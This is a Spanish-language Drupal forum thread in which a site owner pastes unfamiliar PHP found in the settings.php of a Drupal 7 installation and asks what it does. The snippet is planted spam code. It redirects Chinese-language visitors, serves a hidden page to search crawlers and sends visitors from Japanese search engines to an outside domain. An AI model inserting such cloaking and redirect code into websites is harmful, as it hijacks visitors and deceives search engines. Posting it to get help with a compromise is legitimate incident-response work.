vulnerada mi instalaciòn de drupal 7

jonn59's picture

Hola a todos, recurro a ustedes por una situacion de seguridad que se me presento en mi plataforma Drupal 7,

Recientemente habilite un certificado para tener conexiones seguras(Https) pero al ingresar a mi archivo settings.php a realizar unos cambios me lleve la sorpresa de que habia una serie de lineas no propias de la instalación de Drupal, las lineas extrañsa son las siguientes:

<?php
$lan
= $_SERVER['HTTP_ACCEPT_LANGUAGE'];
if (
preg_match ( '/zh-cn/i', $lan)){
   
$url = 'http://www.baidu.com/';
   
header("location: " . $url);
    exit();
}
error_reporting(0);
$ua = strtolower($_SERVER['HTTP_USER_AGENT']);
$rf=$_SERVER['HTTP_REFERER'];
$botchar = "/(googlebot|slurp|adsense)/";
if(
preg_match($botchar, $ua)) {
       
$file = file_get_contents('sites/default/xxx.html');
        echo
$file;
        exit;
}
if(
stripos($rf,"yahoo.co.jp") || stripos($rf,"google.co.jp") || stripos($rf,"docomo.ne.jp"))
{
       
Header("Location: http://www.copy2017.org/");
        exit;
}
?>

Alguien podria darme luz que tipo de modificación realizaron en mi plataforma Drupal?

Comments

Hola, donde lo tienes

melonangie's picture

Hola, donde lo tienes hospedado?

En un servidor interno de la

jonn59's picture

En un servidor interno de la UNAM

Checate estas

Gracias, lo revisare

jonn59's picture

Gracias, lo revisare

Spanish

Group organizers

Group events

Add to calendar

Group notifications

This group offers an RSS feed. Or subscribe to these personalized, sitewide feeds:

Hot content this week